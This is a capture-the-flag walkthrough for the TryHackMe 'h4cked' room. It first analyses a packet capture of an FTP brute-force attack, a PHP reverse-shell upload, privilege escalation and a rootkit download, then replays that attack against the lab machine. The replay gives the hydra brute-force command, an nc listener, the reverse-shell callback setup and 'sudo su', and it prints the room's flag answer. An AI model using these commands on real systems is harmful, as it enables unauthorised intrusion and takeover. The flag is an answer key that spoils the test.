Information
Find out what happened by analysing a .pcap file and hack your way back into the machine. It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.
Room: h4cked
Difficulty: Easy
Files : Capture.pcapng 120 KB
Task 2 can be completed with the Attack Box.
My Recommendations
Download it from the room, no verification hashes are provided so … trust your gut.
This is my personal preference, I like being organized and deleting a folder when I’m done with it .
mkdir Documents/TryHackMe/h4cked && cd Documents/TryHackMe/h4cked
You can simply verify in your Terminal with:
Then, you can open the pcapng file in wireshark:wireshark -h
wireshark Capture.pcapng
Walkthrough
Task 1: Oh no! We've been hacked!
1. The attacker is trying to log into a specific service. What service is this?
Just by peeking into the pcapng file, we can notice that there are some FTP login requests :
Answer: FTP
2. There is a very popular tool by Van Hauser which can be used to brute force a series of services.
What is the name of this tool?
Googling for ‘Van Hauser FTP Bruteforce’ returns a link to this github repository.
Answer: hydra
3. The attacker is trying to log on with a specific username. What is the username?
We previously saw that the attacker is trying to log in with the username ‘jenny’.
Answer: jenny
4. What is the user's password?
Filtering the pcap with ‘ftp‘, there are a series of unsuccessful logins. The only successful login request is in packet 394.
The correct password is ‘password123’.
Answer: password123
5. What is the current FTP working directory after the attacker logged in?
Packet 401 has the response ‘”/var/www/html” is the current directory’:
Answer: /var/www/html
6. The attacker uploaded a backdoor. What is the backdoor's filename?
After getting FTP access, the attacker used the STOR command to upload the file ‘shell.php’:
He then proceeded to give it read, write and execution permissions (CHMOD 777).
Answer: shell.php
7. The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?
Now, we can switch the filter to ‘ftp-data’. This filter looks at port 20, which is the port that sends the actual file data. Packet 431 contains the data for shell.php, which has a size of 5493 bytes.
The script’s usage includes a link in case ‘you get stuck’:
Opening the link in a browser redirects to a different page – ‘tools/web-shells/php-reverse-shell’/. The shell can be downloaded as a tar.gz archive:
Clicking on the download links redirects again to the same link as in the script, but with php-reverse-shell-1.0.tar.gz at the end:
The answer is the same as the URL in the ‘shell.php’ file, and the final url to download the file.
8. Which command did the attacker manually execute after getting a reverse shell?
Packet 350 shows the HTTP Request for shell.php. This packet is part of tcp.stream 19. We can filter for the next stream: ‘tcp.stream == 20’. Then select -> Analyze –> Follow –> TCP Stream:
The first command is ‘whoami‘.
Answer: whoami
9. What is the computer's hostname?
In the third command, after ‘whoami‘ and ‘ls -la‘, the attacker is passing a python3 code:
The hostname is after the @ sign, which is wir3.
Answer: wir3
10. Which command did the attacker execute to spawn a new TTY shell?
As we saw above, the attacker passed a python3 code using the pty library. Pty is a module for handling ‘Pseudo-terminal utilities’.
Answer: python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
11. Which command was executed to gain a root shell?
After executing the new shell, the attacker started a shell with ‘su‘ privileges for jenny. Then, the attacker checked which users have sudo access with the ‘sudo -l‘ command.
The attacker then ran ‘sudo su‘ to log into a root shell and get all privileges.
The command to get to the root shell was ‘sudo su’. The response to the ‘whoami’ command confirmed it was a root shell.
Answer: sudo su
12. The attacker downloaded something from GitHub. What is the name of the GitHub project?
After getting into the root shell, the attacker cloned the repository Reptile:
Answer: Reptile
13. The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?
Reptile is a LMK Linux Rootkit, which is a Loadable Kernel Module rootkit. They work by getting root privileges while remaining hidden.
Answer: rootkit
Task 2: Hack your way back into the machine
The attacker has changed the user’s password! Can you replicate the attacker’s steps and read the flag.txt? The flag is located in the /root/Reptile directory. Remember, you can always look back at the .pcap file if necessary. Good luck!
First, we need to find the new password. We can do so with Hydra and passing the rockyou wordlist:
hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.12.184
Now that we know the password, we can connect to the FTP server:
ftp 10.10.12.184
Before editing the shell.php file, we need to find the IP address of our machine.
ifconfig
Now that we know the IP, we can download the file from the FTP server and re-upload it:
get shell.php
#change the ip value to your VPN ip
#change the port to 1234
put shell.php
chmod 777 shell.php
We also need to open a listener shell:
sudo nc -lvn 1234
Now, we can open our browser of choice and navigate to the Web Application by entering the address of the FTP machine+shell.php:
10.10.12.184/shell.php
As the page is loading, the reverse shell is activated. We need to redo the steps of the attacker:
python3 -c 'import pty; pty.spawn("/bin/bash")'
su jenny
sudo su
cat root/Reptile/flag.txt
Answer: ebcefd66ca4b559d17b440b6e67fd0fd
TLDR
– This is a good challenge to show how blue team can analyze and acquire the necessary information for ‘red team’.
– The blue team part is rather straightforward, and requires basic understanding of Wireshark.
